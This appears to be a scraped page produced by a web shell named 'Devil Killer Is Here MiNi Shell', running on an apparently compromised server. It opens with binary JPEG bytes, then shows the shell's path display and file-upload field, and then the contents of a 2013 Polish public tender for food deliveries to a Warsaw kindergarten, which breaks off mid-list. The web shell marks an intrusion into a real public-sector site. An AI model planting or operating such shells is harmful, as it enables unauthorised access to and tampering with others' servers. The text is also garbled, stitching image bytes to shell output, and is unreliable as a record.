JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131127/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131127/254027-N-2013.html

<p class="kh_header"><b>Warszawa: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH
Z PODZIAŁEM NA 11 PAKIETÓW</b><br>
<b>Numer ogłoszenia: 254027 - 2013; data zamieszczenia: 27.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 4 , ul. Elektoralna 15/17, 00-137 Warszawa, woj. mazowieckie, tel. 22 620 42 46, faks 22 620 42 46.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedszkole4.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH
Z PODZIAŁEM NA 11 PAKIETÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH
Z PODZIAŁEM NA 11 PAKIETÓW.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających nie przekraczających łącznie 20% wartości udzielonego zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkole4.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Nr 4, ul. Elektoralna 15/17, 00-137 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2013 godzina 10:00, miejsce: Przedszkole Nr 4, ul. Elektoralna 15/17, 00-137 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Artykuły mleczarskie:
Mleko pasteryzowane w  folii 1 litr 3,2% tłuszczu	
Litr	
1750

Mleko pasteryzowane w  folii 1 litr 3,2% tłuszczu z dopłatą A.R.R.	
Litr	
1750

Mleko UHT 3,2% tłuszczu	
Litr	
200

Masło świeże w kostkach op. 200 g o zawartości tłuszczu mlecznego min 40% typu ostrołęckiego	
Szt	
1200

Śmietana 18% tłuszczu w op. 400g	
Szt	
900

Ser twarogowy półtłusty pakowany w folię	
Kg	
450

Ser topiony śmietankowy w bloczkach op. 100g	
Szt	
150

Ser żółty Gouda, Edamski, Morski- tłusty	
Kg	
65

Ser żółty Gouda, Edamski, Morski- tłusty z dopłatą A.R.R.	
Kg 	
65

Serek homogenizowany waniliowy op. 140 - 150g	
Szt	
1400

Deser budyniowy op. 100g typu monte	
Szt	
1500

Jogurt owocowy z syropem op 130-150g (NIETERMIZOWANY)	
Szt	
1000

Jogurt pitny op 100g typu actimel	
Szt	
1800

Jogurt naturalny op. 370-470g minimum 2% tłuszczu	
Szt	
400


Maślanka, zaw. tłuszczu min. 1,5% op. 500g	
Litr	
20

Mozarella 	
Kg	 
10

Kefir, zaw. tłuszczu min. 1,5% op. 500g	
Litr	
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pieczywo, pieczywo cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pieczywo, pieczywo cukiernicze: 
Chleb baltonowski krojony 400-500g	
Szt	
750

Chleb razowy krojony 500g	
Szt	
150

Chleb razowy ze słonecznikiem krojony 500g	
Szt	
200

Chałka 300g	
Szt	
100

Grahamki 30g	
Szt	
2000

Bułka paryska 300g krojona	
Szt	
350

Kajzerki pszenne 30g	
Szt	
3000

Bułka tarta 0,5 kg	
Szt	
100

Bułeczki maślane 50g	
Szt
	
300

Rogaliki maślane 80-100g	
Szt	
300

Drożdżówka z jabłkiem 80g - 100 g	
Szt
	
160

Drożdżówka z serem 80g - 100 g	
Szt
	
160

Drożdżówka z budyniem 80g - 100 g	
Szt
	
160

Bagietki pszenne 300-350g	
Szt	
50

Bagietki pełnoziarniste  300-350g	
Szt	
50

Pączki liliputy bez nadzienia	
Kg
	
20

Pączki z marmoladą 80-100g	
Szt	
200

Jagodzianki  80-100g	
Szt	
160

Ciasteczka ze słonecznikiem, siemieniem, płatkami owsianymi itp.	
Kg	
40

Ciasto drożdżowe z rodzynkami	
Kg	
40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warzywa i owoce krajowe - świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warzywa i owoce krajowe - świeże: 
Brokuły świeże gatunek I	
Szt	
100


Cebula biała, świeża gat. I	
Kg	
80

Cukinia świeża  z miękką skórką, maksymalna długość 30 cm gat. I	
Kg	
20

Cykoria świeża gat. I	
Kg	
5

Czosnek , główka min 70 g, gat. I	
Szt	
130

Kabaczek świeży, maksymalna długość 30 cm, gat. I	
Kg	
20

Kalafior świeży, gat. I	
Szt	
30

Kapusta biała w główkach, świeża gat. I	
Kg	
60


Kapusta kiszona, nieprzekwaszona gat. I opakowanie wiaderko plastikowe szczelnie zamknięte pokrywą	
Kg	
70

Kapusta pekińska świeża gat. I	
Kg	
150

Kapusta włoska świeża gat. I	
Kg	
50

Kapusta czerwona świeża gat. I	
Kg	
30

Koper świeży w pęczkach, gat. I	
Szt	
170

Marchew karotka, świeża gat. I	
Kg	
220


Natka świeża w pęczkach,  gat. I	
Szt	
170

Ogórek świeży gat. I	
Kg	
130

Ogórek kiszony, twardy, gat. I opakowanie - wiaderko plastikowe szczelnie zamknięte pokrywą	
Kg	
160

Ogórek małosolny , twardy, gat. I opakowanie wiaderko plastikowe szczelnie zamknięte pokrywą	
Kg
	
25

Papryka czerwona, żółta, pomarańczowa, świeża gat. I	
Kg	
90

Pieczarki świeże o średnicy nie większej  niż 4 cm.,   gat. I	
Kg	
40

Pietruszka świeża gat. I	
Kg	
20

Pomidory świeże gat. I	
Kg	
130

Pory świeże, średnica minimum 3 cm gat. I	
Szt	
25

Rzodkiewka świeża gat. I	
Szt	
160

Sałata świeża gat. I	
Szt	
60

Sałata lodowa świeża gat. I	
Szt	
90

Seler korzeniowy świeży gat. I	
Kg	
20

Szczypiorek świeży w pęczkach gat. I	
Szt	
60

Ziemniaki młode od maja do sierpnia o średnicy minimum 6 cm	
Kg
	
900

Ziemniaki późne od września 2013 do kwietnia 2014 ze zbiorów 2013r.	
Kg	
2200

Brzoskwinia krajowa, soczysta, świeża gat. I	
Kg	
50

Gruszki świeże, odmiany: Konferencja, Generał, Klapsa- gat. I	
Kg	
100

Jabłka Cortland. Ligol, Champion, Delikates, Antonówka, Reneta  świeże, bez plam gat. I	
Kg	
700

Maliny w opakowaniu tekturowym 500g	
Szt
	
50

Morele krajowe, świeże gat.I	
Kg	
30

Truskawki świeże, pakowane w łubianki, gat I	
Kg	
100

Śliwki świeże z pestkami łatwo odchodzącymi od miąższu	
Kg	
80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Cytrusy i owoce importowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cytrusy i owoce importowane: 
Arbuz dojrzały, słodki, świeży, gat. I	
Kg
	
200

Banany bez plam, gat. I typu chiguita	
Kg	
500

Brzoskwinie świeże, słodkie, soczyste, gat. I	
Kg
	
50

Cytryny gat. I	
Kg	
25

Kaki, dojrzałe, słodkie gat. I	
Szt
	
80

Kiwi dojrzałe, gat. I
	
Szt	
800

Mandarynki słodkie, soczyste, bez pestek, gat. I	
Kg
	
200

Melon słodki, soczysty, gat. I	
Kg	
90

Nektarynki świeże, słodkie, soczyste, gat. I	
Kg
	
30


Pomarańcze słodkie, soczyste, gat. I	
Kg	
150

Winogrona, rodzynkowe-bezpestkowe, jasne, ciemne różowe, gat. I	
Kg	
100

Winogrona,  jasne,  ciemne różowe, słodkie, gat. I	
Kg
	
100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mrożonki: 
Brokuły, opakowanie nie większe niż 2500g. gat. I	
Kg
	
60

Bukiet warzyw  opakowanie nie większe niż 2500g. gat. I	
Kg
	
20

Buraki mrożone wiórki opakowanie 450-500g gat. I	
Kg
	
200

Fasolka szparagowa opakowanie nie większe niż 2500g. gat. I	
Kg
	
50

Kalafior mrożony  opakowanie nie większe niż 2500g. gat. I	
Kg
	
30

Marchewka z groszkiem opakowanie nie większe niż 2500g. gat. I	
Kg	
80
Marchewka krojona w kostkę, opakowanie nie większe niż 2500g. gat. I	
Kg
	
50

Marchewka mini opakowanie nie większe niż 2500g. gat. I	
Kg
	
40

Maliny opakowanie nie większe niż 2500g. gat. I
	
Kg
	
30

Mieszanka kompotowa opakowanie nie większe niż 2500g. 
gat. I	
Kg
	
180

Mieszanka warzywna, drobno krojona, opakowanie nie większe niż 2500g. gat. I	
Kg
	
100

Porzeczka czarna opakowanie nie większe niż 2500g. gat. I	
Kg
	
80

Śliwki bez pestek opakowanie nie większe niż 2500g. gat. I	
Kg
	
100

Truskawki opakowanie nie większe niż 2500g. gat. I	
Kg
	
450

Włoszczyzna krojona w paski opakowanie nie większe niż 2500g. gat. I	
Kg
	
150

Włoszczyzna krojona w kostkę  opakowanie nie większe niż 2500g. gat. I	
Kg	
300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mieso i wędliny świeże, nie mrożone i nierozmrażane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mieso i wędliny świeże, nie mrożone i nierozmrażane: 
 Cielęcina zadnia bez kości, w kawałkach minimum 500g, świeża	
Kg
	
30

Mięso z piersi indyka bez skóry, bez kości, świeże, gat. I	
Kg	
130

Mięso z piersi kurczaka bez skóry bez kości, świeże, gat. I	
Kg	
130

Kurczak -udka (pałki) , świeże, gat. I	
Kg	
80

Kurczak udziec-bioderko z kością 15-20g	
Kg	
40

Kurczak ćwiartki	
Kg
	
20

Szyja indycza bez skóry, świeża, gat. I	
Kg	
230

Schab wieprzowy środkowy, bez kości, o średnicy nie większej niż  10cm,bez tłuszczu, świeży, gat. I	
Kg	
100

Wieprzowina łopatka świeża, gat. I	
Kg	
40

Wieprzowina szynka surowa, bez kości świeża gat. I	
Kg	
120

Wołowina - szponder wołowy, rosołowy , świeży, gat. I	
Kg
	
25

Kiełbasa krakowska, sucha, nie parzona, gat. I	
Kg	
30

Kiełbasa podwawelska gat I	
Kg	
40

Kiełbasa żywiecka gat. I	
Kg	
30

Parówki wieprzowe lub drobiowe, odtłuszczone, zawartość mięsa wieprzowego, drobiowego, cielęcego minimum 68% typu sokołów gat. I	
Kg
	
70

Polędwica sopocka o zawartości mięsa wieprzowego minimum 78% gat. I	
Kg	
50

Schab środkowy pieczony w majeranku gat. I 	
Kg
	
10

Polędwica z piersi indyka gat. I	
Kg	
25

Szynka wieprzowa delikatesowa bez tłuszczu, minimum 67% mięsa wieprzowego gat. I	
Kg	
30

Szynkowa wieprzowa gat. I	
Kg	
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Artykuły ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Artykuły ogólnospożywcze: 
Ananas plastry w syropie puszka 650g gat. I	
Szt	
160

Bazylia op. 10-15g	
Szt
	
30

Barszcz biały w proszku op. 66g typu winiary	
Szt	
250

Biszkopty opakowane szczelnie, w opakowania nie większe niż 500g.	
Kg	
30

Brzoskwinia-połówki w syropie puszka 820-850g	
Szt	
200

Budyń waniliowy lub śmietankowy z cukrem, bez sztucznych barwników,  opakowanie 60g typu winiary	
Szt	
400

Cynamon w proszku op. 10-20g	
Szt	
20

Chałwa waniliowa 100 g.	
Szt 	
100

Chrzan w słoikach 300g, bez dodatku octu	
Szt	
10

Ciasteczka kruche gat. I opakowanie nie większe niż 1000g	
Kg	
30

Cukier op.1000g	
Kg
	
600

Cukier puder op.  400g	
Szt	
40

Cukier waniliowy op. 32g	
Szt	
200

Cukierki czekoladowe typu wedel  i czekoladowe z galaretką typu wiosenne lub typu mieszanka krakowska	
Kg	
20

Cukierki z galaretki	
Kg
	
20

Czekolada typu Kinder - pojedynczo pakowane batoniki w opakowaniu 100g, zawartość czekolady 40%, wartość kaloryczna w 100g produktu 564 kcal	
Szt
	
200

Drożdże op. 100 g	
Szt	
20

Drożdże instant op. 7g typu dr oetker	
Szt	
70

Dżem owocowy, niskosłodzony z zawartością owocu 40 g w 100g wyrobu gotowego słoik ok.280- 300g	
Szt	
220


Figurki z czekolady mlecznej-prawdziwej w kształcie Mikołaja lub zajączka opakowane folia alum. zdobiona masa ok. 50-75g	
Szt
	
200

Galaretka owocowa w proszku, bez sztucznych barwników, różne smaki, op. papierowe min. 75g typu winiary	
Szt
	
80

Groch łuskany, nasiona suche opakowanie 400g	
Kg	
30


Groszek konserwowy w puszce 400g	
Szt
	
50

Herbata czarna, ekspresowa typu lipton  op. 100 szt	
Szt	
25


Herbata owocowa ekspresowa hibiscus, malina, owoce leśne	
Szt	
60

Jajko czekoladowe z niespodzianką w środku typu kinder	
Szt
	
600

Kasza jęczmienna perłowa, drobna op. maksimum 1000g	
Kg	
80

Kakao o obniżonej zawartości tłuszczu z zawartością 11% tłuszczu kakaowego op. 100g typu wedel	
Szt	
80

Kasza gryczana op. nie większe niż 1000g	
Kg	
70


Kasza jaglana op. nie większe niż 1000g	
Kg	
15

Kasza manna op. 1000g	
Kg	
20

Kawa zbożowa rozpuszczalna typu inka op. 150g	
Szt	
50

Ketchup o zawartości pomidorów 45 g na 100g  bez konserwantów, łagodny, typu pudliszki, typu kotlin op.450-480g	
Szt	
100


Koncentrat buraczany op. 300g, do sporządzenia 4-6 ltrów gotowego barszczu typu krakus, gat.I	
Szt	
70

Koncentrat pomidorowy bez konserwantów, bez sztucznych dodatków, zawartość ekstraktu 30% op. 190-220g	
Szt	
300

Krakersy op. 180g typu lajkonik	
Szt
	
30

Kukurydza konserwowa w puszce, bez cukru op. 425g	
Szt	
70


Kwasek cytrynowy min. 20g	
Szt 	
40

Liście laurowe op. 8-10g typu kamis lub typu prymat	
Szt	
30

Majeranek op. 8-10g typu kamis lub typu prymat	
Szt	
130

Majonez op.400g w słoiku - bez konserwantów typu winiary	
Szt	
90

Makaron z pszenicy durum 100%, różne formy op. 400g lub 500g typu lubella	
Kg
	
150

Makaron do rosołu domowy, swojski, nitki walcowane, krótkie,  typu goliard.op.  250 g	
Kg
	
25

Mąka orkiszowa op. 1000g	
Kg
	
20


Mąka ziemniaczana op. 1000g	
Kg
	
15

Mąka pszenna op. 1000g	
Kg	
280


Mięta ekspresowa op. 20 szt	
Szt	
25

Migdały op. 200g	
Kg	
5

Miód pszczeli naturalny produkcji polskiej op. słoik nie większy niż 1200g	
Kg	
50

Morele suszone op. 100g lub 200g 	
Kg
	
15

Krem do smarowania  z orzechami laskowymi i kakao , wartość energetyczna 544kcal w 100g produktu op. słoik 350g ,  typu nutella	
Szt	
40

Oregano  op. 10g typu kamis lub typu prymat	
Szt	
30

Olej rzepakowy z pierwszego tłoczenia typu kujawski op. 1 litr 	
Litr	
230

Oliwa z oliwek z pierwszego tłoczenia, butelka szklana 500ml	
Szt	
10

Orzechy włoskie łuskane op. 200g	
Kg
	
5

Orzechy laskowe łuskane op. 200g	
Kg
	
5

Papryka słodka w proszku op.20g	
Szt	
50

Paluszki słone op. 200g typu lajkonik	
Szt	
80

Pieprz czarny, prawdziwy, mielony op.10-20 g	
Szt	
60

Płatki czekoladowe lub cynamonowe op. 500g typu nesquick, nestle	
Szt	
170

